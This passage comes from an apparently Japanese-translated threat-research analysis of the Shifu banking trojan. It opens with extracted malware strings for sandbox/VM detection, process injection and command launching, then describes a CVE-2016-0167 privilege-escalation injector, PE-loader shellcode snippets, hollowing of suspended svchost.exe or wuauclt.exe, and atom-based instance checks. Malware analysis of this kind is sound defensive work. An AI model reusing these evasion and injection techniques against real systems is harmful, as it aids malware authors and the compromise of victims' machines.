application\/x-www-form-urlencoded\\r\\n\r\nHost: %s\\r\\n%d.%d.%d.%d\r\n%d.%d.%d.%d.%x\r\n%temp%\\\\debug_file.txt\r\n[%u][%s:%s:%u][0x%x;0x%x] %sDnsFlushResolverCache\r\n\\\\*.*\r\ndnsapi.dll\r\nDnsGetCacheDataTable.dll.exedownload.windowsupdate.com\r\nvk.com\r\nyandex.ru\r\nHTTP\/1.1https:\/\/http:\/\/%s\r\nIsWow64Process\r\nkernel\r\nkernel32.dllLdrGetProcedureAddress\r\nMicrosoft\r\nNtAllocateVirtualMemory\r\nCLOSED\r\nLAST_ACKTIME_WAIT\r\nDELETE_TCB\r\nLISTEN\r\nSYN_SENTSYN_RCVDESTAB\r\nFIN_WAIT1\r\nFIN_WAIT2\r\nCLOSE_WAIT\r\nCLOSING\r\nTCP\\t%s:%d\\t%s:%d\\t%s\\n\r\nnetstat\\nProto\\tLocal address\\tRemote address\\tState\\n\r\nntdll.dll\r\nNtResumeProcess\r\nNtSuspendProcess\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\drivers\\\\null.sys\r\nNtWriteVirtualMemoryopenRegisterApplicationRestart\r\nRtlCreateUserThread\r\nResetSR\r\nRtlComputeCrc32\r\nrundll32SeDebugPrivilegeSystemDrive\r\n\\\\StringFileInfo\\\\%04x%04x\\\\ProductName\r\nsoftware\\\\microsoft\\\\windows nt\\\\currentversion\\\\winlogon\r\nshell\r\nSleep\r\nsrclient.dllSeShutdownPrivilege\r\n\\\"%s\\\"\r\n%d\\t%s\\ntaskmgr\\nPID\\tProcess name\\nnet user\\n\r\nthe computer is joined to a domain\\n..\r\n\\\\VarFileInfo\\\\Translation\r\n%windir%\\\\system32\\\\%windir%\\\\syswow64\\\\POST*.exe\r\n%SystemDrive%\\\\\r\n*SYSTEM*%02x%s:Zone.Identifier\r\nGetProcessUserModeExceptionPolicy\r\nSetProcessUserModeExceptionPolicy\r\n%ws\\\\%ws\\n\r\nWORKGROUP\r\nHOMESoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\ExplorerDisableCurrentUserRun\r\n%s.dat\r\nsoftware\\\\microsoft\\\\windows%OS%_%NUMBER_OF_PROCESSORS%\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)(A;;GA;;;AC)\r\n\\\\\\\\.\\\\AVGIDSShim\r\nFFD3\\\\\\\\.\\\\NPF_NdisWanIpc:\\\\sample\\\\pos.exe\r\nANALYSERS\r\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nFORTINETMALNETVMc:\\\\analysis\\\\sandboxstarter.exec:\\\\analysisc:\\\\insidetmc:\\\\windows\\\\system32\\\\drivers\\\\vmmouse.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vmhgfs.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vboxmouse.sys\r\nc:\\\\iDEFENSEc:\\\\popupkiller.exe\r\nc:\\\\tools\\\\execute.exe\r\nc:\\\\Perlc:\\\\Python27api_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\ndbghelp.dll\r\nProcess32NextW\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n1406.bitMiniDumpWriteDump\r\n\\r\\nReferer: %s\\r\\n\r\n\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\r\nvar %s = new ActiveXObject(\"WScript.Shell\"); %s.Run(\"%s\");\r\nIntelPowerAgent32\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\n%s\\cmd.exe\r\nComSpec\r\nConsoleWindowClass\r\n.exekernel32.dllntdll.dll\r\nZwQuerySystemInformationZwAllocateVirtualMemory\r\nPsLookupProcessByProcessId\r\nPsReferencePrimaryToken\r\nClass\r\nWindow\r\nopen \"%s\" -q%windir%\\\\system32\\\\sdbinst.exe\r\n \/c \"start \"\" \"%s\" -d\"\r\n%windir%\\\\system32\\\\sndvol.exe\r\n \"%s\" -u \/c \"%s\\\\SysWOW64\\\\SysSndVol.exe \/c \"start \"\" \"%s\" -d\"\"\r\n%temp%\\\\%u\r\n%u.tmp\r\nWow64DisableWow64FsRedirection\r\nWow64RevertWow64FsRedirection\r\nrunas.exe\r\n%systemroot%\\\\system32\\\\svchost.exe\r\n%systemroot%\\\\system32\\\\wscript.exe\r\nsnxhk.dll\r\nsbiedll.dll\r\n \/c start \"\" \"%s\" \" \"\r\ncmd.exe\r\nrunas\r\n --crypt-test\r\nIt work's!\r\n --vm-test\r\n<\/pre>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u3068\u57cb\u3081\u8fbc\u307fCVE-2016-0167\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/h4>\n<p style=\"font-weight: 400;\">\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u611f\u67d3\u3055\u308c\u305f\u30db\u30b9\u30c8\u306eSYSTEM\u6a29\u9650\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u306f\u3001x86\u30b7\u30b9\u30c6\u30e0\u7528\u3068x64\u30b7\u30b9\u30c6\u30e0\u7528\u306e\u4e21\u65b9\u306e\u5b9f\u969b\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u5148\u982d\u306e\u30de\u30b8\u30c3\u30afPE\u30d0\u30a4\u30c8(\u201cMZ\u201d)\u306f\u3001\u305d\u308c\u3089\u304c\u81ea\u52d5\u62bd\u51fa\u3055\u308c\u308b\u306e\u3092\u963b\u6b62\u3059\u308b\u305f\u3081\u3001null\u30d0\u30a4\u30c8\u3067\u30d1\u30c3\u30c1\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u73fe\u5728\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u3068OS\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u78ba\u8a8d\u3057\u307e\u3059\u3002\u30d7\u30ed\u30bb\u30b9\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u304c\u4f4e\u304f\u3001OS\u30d0\u30fc\u30b8\u30e7\u30f3\u304c6.1 (Windows 7\/Windows Server 2008 R2)\u306e\u5834\u5408\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30d5\u30a1\u30a4\u30eb\u3092\u30e1\u30e2\u30ea\u306b\u66f8\u304d\u8fbc\u307f\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001PE\u30aa\u30fc\u30d0\u30fc\u30ec\u30a4\u306e\u5148\u982d\u3092\u30de\u30fc\u30af\u3057\u3066\u3044\u308b\u30de\u30b8\u30c3\u30af\u50240x99999999\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u5185\u3067\u691c\u7d22\u3057\u307e\u3059\u3002\u30a2\u30c9\u30ec\u30b9\u304c\u898b\u3064\u304b\u308b\u3068\u300112\u30d0\u30a4\u30c8\u304c\u8ffd\u52a0\u3055\u308c\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u5b9f\u969b\u306b\u306f\u30ab\u30b9\u30bf\u30e0PE\u30ed\u30fc\u30c0\u30fc \u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3067\u3042\u308b\u3001\u3053\u306e\u30a2\u30c9\u30ec\u30b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u547c\u3073\u51fa\u3057\u306f\u3001\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00401EF5   pusha\r\n00401EF6   add esi, 0Ch\r\n00401EF9   call esi   -&gt; PE loader shellcode in overlay\r\n00401EFB   popa\r\n<\/pre>\n<h4>\u30ab\u30b9\u30bf\u30e0PE\u30ed\u30fc\u30c0\u30fc \u30b7\u30a7\u30eb\u30b3\u30fc\u30c9<\/h4>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306b\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u7d42\u308f\u308a\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u5f8c\u304b\u3089\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30d5\u30a1\u30a4\u30eb\u5185\u3067\u30de\u30b8\u30c3\u30afPE\u5024(\u201cMZ\u201d)\u3092\u30b9\u30ad\u30e3\u30f3\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306e\u7d42\u308f\u308a\u3092\u53d6\u5f97\u3059\u308b\u30b3\u30fc\u30c9\u306f\u3001\u4ee5\u4e0b\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00077174   jmp short 00077178\r\n00077176   pop eax\r\n00077177   retn\r\n00077178   call 00077176\r\n<\/pre>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u30ab\u30b9\u30bf\u30e0GetProcAddress()\u95a2\u6570\u3092\u30cf\u30c3\u30b7\u30e5\u95a2\u6570\u3068\u4e00\u7dd2\u306b\u4f7f\u7528\u3057\u3066\u3001VirtualAllocEx()\u306e\u30a2\u30c9\u30ec\u30b9\u3092\u691c\u7d22\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001VirtualAllocEx()\u3092\u547c\u3073\u51fa\u3057\u3001\u9069\u5207\u306a\u30e1\u30e2\u30ea \u30a2\u30e9\u30a4\u30e1\u30f3\u30c8\u3067\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u66f8\u304d\u8fbc\u3080\u3053\u3068\u306e\u3067\u304d\u308b\u30d5\u30eb \u30a2\u30af\u30bb\u30b9\u6a29\u306e\u3042\u308b\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u3092\u5272\u308a\u5f53\u3066\u307e\u3059\u3002\u5fc5\u8981\u306a\u30e1\u30e2\u30ea \u30a2\u30c9\u30ec\u30b9\u306f\u518d\u914d\u7f6e\u60c5\u5831\u3092\u7528\u3044\u3066\u8abf\u6574\u3055\u308c\u3001API\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u3001IAT\u304c\u57cb\u3081\u3089\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u304c\u65b0\u305f\u306b\u4f5c\u6210\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc \u30e2\u30b8\u30e5\u30fc\u30eb\u306eDLL\u5165\u53e3\u70b9\u306b\u30b8\u30e3\u30f3\u30d7\u3057\u307e\u3059\u3002<\/p>\n<h4>\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc<\/h4>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306b\u3001\u6587\u5b57\u5217\u201ckernel32.dll\u201d\u3001\u201cLoadLibrary\u201d\u3001\u304a\u3088\u3073\u201cGetProcAddress\u201d\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001kernel32.dll\u306e\u30a4\u30e1\u30fc\u30b8 \u30d9\u30fc\u30b9 \u30a2\u30c9\u30ec\u30b9\u304c\u691c\u7d22\u3055\u308c\u3001LoadLibrary()\u304a\u3088\u3073GetProcAddress()\u306e\u4e21\u30a2\u30c9\u30ec\u30b9\u304c\u53d6\u5f97\u3055\u308c\u307e\u3059\u3002\u3053\u308c\u3089\u306eAPI\u95a2\u6570\u3092\u5229\u7528\u3059\u308b\u3053\u3068\u3067\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306eIAT\u30a2\u30c9\u30ec\u30b9\u304c\u89e3\u6c7a\u3055\u308c\u3001IAT\u304c\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u3088\u3063\u3066\u51e6\u7406\u306f\u3059\u3067\u306b\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3001\u3053\u306e\u95a2\u6570\u306e\u76ee\u7684\u306f\u4e0d\u660e\u3067\u3059\u3002\u305d\u306e\u5f8c\u3001API\u95a2\u6570CreateThread()\u306b\u3088\u3063\u3066\u3001\u65b0\u3057\u3044\u30b9\u30ec\u30c3\u30c9\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u3053\u306e\u30b9\u30ec\u30c3\u30c9\u306f\u307e\u305aIsWow64Process()\u3092\u547c\u3073\u51fa\u3057\u3001\u305d\u306e\u7d50\u679c\u306b\u5fdc\u3058\u3066\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d5\u30a1\u30a4\u30eb\u306e\u57cb\u3081\u8fbc\u307fx86\u30d0\u30fc\u30b8\u30e7\u30f3\u307e\u305f\u306fx64\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u3044\u305a\u308c\u304b\u304c\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u6b21\u306b\u3001PE\u30de\u30b8\u30c3\u30af\u5024(\u201cMZ\u201d)\u304c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d5\u30a1\u30a4\u30eb\u306e\u5148\u982d\u306b\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u7d9a\u3044\u3066\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u5f8c\u3067\u4f7f\u7528\u3059\u308b\u3001\u201cWaitEventX\u201d\u3068\u3044\u3046\u30a4\u30d9\u30f3\u30c8\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u305d\u306e\u5f8c\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u30e1\u30a4\u30f3\u95a2\u6570\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u95a2\u6570\u3067\u306f\u3001\u6b21\u306e\u30d7\u30ed\u30bb\u30b9\u540d\u304c\u691c\u7d22\u3055\u308c\u3001\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u306f\u3001Trend Micro\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u4e00\u90e8\u3067\u3042\u308b\u6b21\u306e\u6587\u5b57\u5217\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u540d\u3082\u691c\u7d22\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">\u201cuiSeAgnt.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201cPtSessionAgent.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201cPwmSvc.exe\u201d<\/li>\n<li style=\"font-weight: 400;\">\u201ccoreServiceShell.exe\u201d<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u3053\u308c\u3089\u306e\u30d7\u30ed\u30bb\u30b9\u306e\u3044\u305a\u308c\u304b\u304c\u898b\u3064\u304b\u3063\u305f\u5834\u5408\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9wuauclt.exe\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u306f\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9svchost.exe\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3044\u305a\u308c\u306e\u5834\u5408\u306b\u3082\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u5f15\u6570\u201c-k netsvcs\u201d\u304c\u6e21\u3055\u308c\u307e\u3059\u304c\u3001\u3053\u308c\u306fsvchost.exe\u3067\u306e\u307f\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002Trend Micro\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8 \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306ex64\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u308b\u5834\u5408\u3001\u3053\u306e\u6a5f\u80fd\u306f\u5fc5\u305a\u5931\u6557\u3057\u307e\u3059\u3002\u3053\u306e\u30b3\u30fc\u30c9(x86)\u306fx64\u30d7\u30ed\u30bb\u30b9\u306eCreateToolhelp32Snapshot()\u3092\u547c\u3073\u51fa\u3059\u305f\u3081\u3001\u30a8\u30e9\u30fc(ERROR_PARTIAL_COPY)\u304c\u767a\u751f\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u30b3\u30fc\u30c9\u306f\u3001\u4fdd\u8b77\u3055\u308c\u305fTrend Micro\u30d7\u30ed\u30bb\u30b9\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3092\u8a66\u307f\u308b\u305f\u3081\u3001\u5931\u6557\u3057\u307e\u3059(ERROR_ACCESS_DENIED)\u3002<\/p>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001CreateFileMapping()\u304a\u3088\u3073MapViewOfFile()\u3092\u4f7f\u7528\u3057\u3066\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306ex86\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306fx64\u30d5\u30a1\u30a4\u30eb\u304c\u30e1\u30e2\u30ea\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u3001\u305d\u306e\u30e1\u30e2\u30ea\u304c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306e\u30d0\u30a4\u30c8\u3067\u57cb\u3081\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001ZwMapViewOfSection()\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u304c\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9svchost.exe\u307e\u305f\u306fwuauclt.exe\u306b\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u307e\u3059\u3002OS\u30d0\u30fc\u30b8\u30e7\u30f3\u304c5.2 (Windows Server 2003 \/ Windows XP 64\u30d3\u30c3\u30c8 \u30a8\u30c7\u30a3\u30b7\u30e7\u30f3)\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u304c\u78ba\u8a8d\u3055\u308c\u3001\u305d\u3046\u3067\u3042\u308b\u5834\u5408\u306f\u95a2\u6570\u304c\u7d42\u4e86\u3057\u307e\u3059\u3002\u305d\u306e\u5f8c\u30012\u3064\u306e\u30e1\u30e2\u30ea \u30d0\u30c3\u30d5\u30a1\u304c\u4f5c\u6210\u3055\u308c\u3001\u305d\u308c\u305e\u308c\u306b\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u304c\u66f8\u304d\u8fbc\u307e\u308c\u307e\u3059\u3002\u6700\u521d\u306e\u96e3\u8aad\u5316\u3055\u308c\u305f\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u306f\u3001\u30de\u30c3\u30d4\u30f3\u30b0\u3055\u308c\u305f\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d5\u30a1\u30a4\u30eb\u306e\u30b9\u30c6\u30fc\u30b8\u30e3\u30fc\u3067\u3042\u308b2\u756a\u76ee\u306e\u30b7\u30a7\u30eb\u30b3\u30fc\u30c9\u3092\u547c\u3073\u51fa\u3057\u307e\u3059\u3002\u6b21\u306b\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u3001ResumeThread()\u3092\u547c\u3073\u51fa\u3057\u3066\u3001\u4e2d\u65ad\u72b6\u614b\u306e\u30d7\u30ed\u30bb\u30b9\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306f\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306b\u6210\u529f\u3057\u305f\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u3001\u305d\u306e\u6574\u5408\u6027\u30ec\u30d9\u30eb\u304cSECURITY_MANDATORY_LOW_RID\u306e\u307e\u307e\u3067\u3042\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002\u305d\u3046\u3067\u306a\u3044\u5834\u5408\u3001\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u6a29\u9650\u3092SECURITY_MANDATORY_SYSTEM_RID\u306b\u6607\u683c\u3055\u305b\u305f\u3053\u3068\u306b\u306a\u308a\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u304c\u7d99\u7d9a\u3055\u308c\u307e\u3059\u3002\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304c\u5931\u6557\u3057\u305f\u5834\u5408\u3001SYSTEM\u30e6\u30fc\u30b6\u30fc \u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u306eWindows\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3(cmd.exe)\u304a\u3088\u3073runas.exe\u30c4\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u305f\u81ea\u8eab\u306e\u5b9f\u884c\u304c\u8a66\u307f\u3089\u308c\u307e\u3059\u3002<\/p>\n<h4>Atom\u6587\u5b57\u5217\u306e\u69cb\u7bc9<\/h4>\n<p style=\"font-weight: 400;\">\u4eca\u65e5\u306e\u307b\u3068\u3093\u3069\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u3088\u3046\u306b\u30df\u30e5\u30fc\u30c6\u30c3\u30af\u30b9\u3092\u4f7f\u7528\u3059\u308b\u304b\u308f\u308a\u306b\u3001\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306fatom\u3092\u4f5c\u6210\u3057\u3001Shifu\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u304c\u3059\u3067\u306b\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306b\u30b0\u30ed\u30fc\u30d0\u30eb\u306eatom\u8868\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u307e\u305a\u3001API ExpandEnvironmentStrings()\u306e\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u6587\u5b57\u5217\u201c%OS%_%NUMBER_OF_PROCESSORS%\u201d\u3092\u4f7f\u7528\u3057\u3066\u3001Windows\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u30d7\u30ed\u30bb\u30c3\u30b5\u6570\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u30011\u3064\u306e\u30d7\u30ed\u30bb\u30c3\u30b5\u3067\u7a3c\u50cd\u3059\u308bWindows 7\u306e\u5834\u5408\u3001\u7d50\u679c\u306f\u201cWindows_NT_1\u201d\u306b\u306a\u308a\u307e\u3059\u3002\u3053\u306e\u6587\u5b57\u5217\u306f\u3001\u6b21\u306e\u521d\u671f\u5024\u3092\u6301\u3064RtlComputeCrc32()\u3067\u30014\u3064\u306eCRC32\u30cf\u30c3\u30b7\u30e5\u3092\u8a08\u7b97\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xFFFFFFFF<\/li>\n<li style=\"font-weight: 400;\">0xEEEEEEEE<\/li>\n<li style=\"font-weight: 400;\">0xAAAAAAAA<\/li>\n<li style=\"font-weight: 400;\">0x77777777<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6587\u5b57\u5217\u201cWindows_NT_1\u201d\u3067\u751f\u6210\u3055\u308c\u308bCRC\u30cf\u30c3\u30b7\u30e5\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0x395693AE<\/li>\n<li style=\"font-weight: 400;\">0xB24495D2<\/li>\n<li style=\"font-weight: 400;\">0xF39F86E1<\/li>\n<li style=\"font-weight: 400;\">0xBAE0B5C8<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6b21\u306b\u3001\u5404CRC\u30cf\u30c3\u30b7\u30e5\u306e\u6700\u5f8c\u306e\u30d0\u30a4\u30c8\u304c\u3001\u30b9\u30bf\u30c3\u30af\u4e0a\u306eDWORD\u5024\u3068\u3057\u3066\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">0xAE000000 (0x395693AE\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xD2000000 (0xB24495D2\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xE1000000 (0xF39F86E1\u306e\u4e00\u90e8)<\/li>\n<li style=\"font-weight: 400;\">0xC8000000 (0xBAE0B5C8\u306e\u4e00\u90e8)<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u30cf\u30c3\u30b7\u30e5 \u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u3092\u542b\u3080\u30b9\u30bf\u30c3\u30af\u306f\u3001\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">AE 00 00 00 D2 00 00 00 E1 00 00 00 C8 00 00 00<\/p>\n<p style=\"font-weight: 400;\">snprintf()\u95a2\u6570\u3092\u4f7f\u7528\u3057\u3066\u3001\u30cf\u30c3\u30b7\u30e5 \u30d0\u30a4\u30c8 \u30b7\u30fc\u30b1\u30f3\u30b9\u306e\u6700\u521d\u306e8\u30d0\u30a4\u30c8\u3092ASCII\u6587\u5b57\u306b\u5909\u63db\u3059\u308b\u3053\u3068\u3067\u3001atom\u6587\u5b57\u5217\u304c\u4f5c\u6210\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u5834\u5408\u306e\u7d50\u679c\u306f\u3001\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">\u201cae000000d2000000\u201d<\/p>\n<p style=\"font-weight: 400;\">\u6700\u5f8c\u306b\u3001atom\u304c\u5b58\u5728\u3059\u308b\u304b\u3069\u3046\u304b\u3092\u78ba\u8a8d\u3059\u308b\u305f\u3081\u306bGlobalFindAtom() API\u304c\u547c\u3073\u51fa\u3055\u308c\u3001\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\u306f\u3001GlobalAddAtom()\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23099\" aria-describedby=\"caption-attachment-23099\" style=\"width: 742px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23099 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_3.png\" alt=\"\u56f33 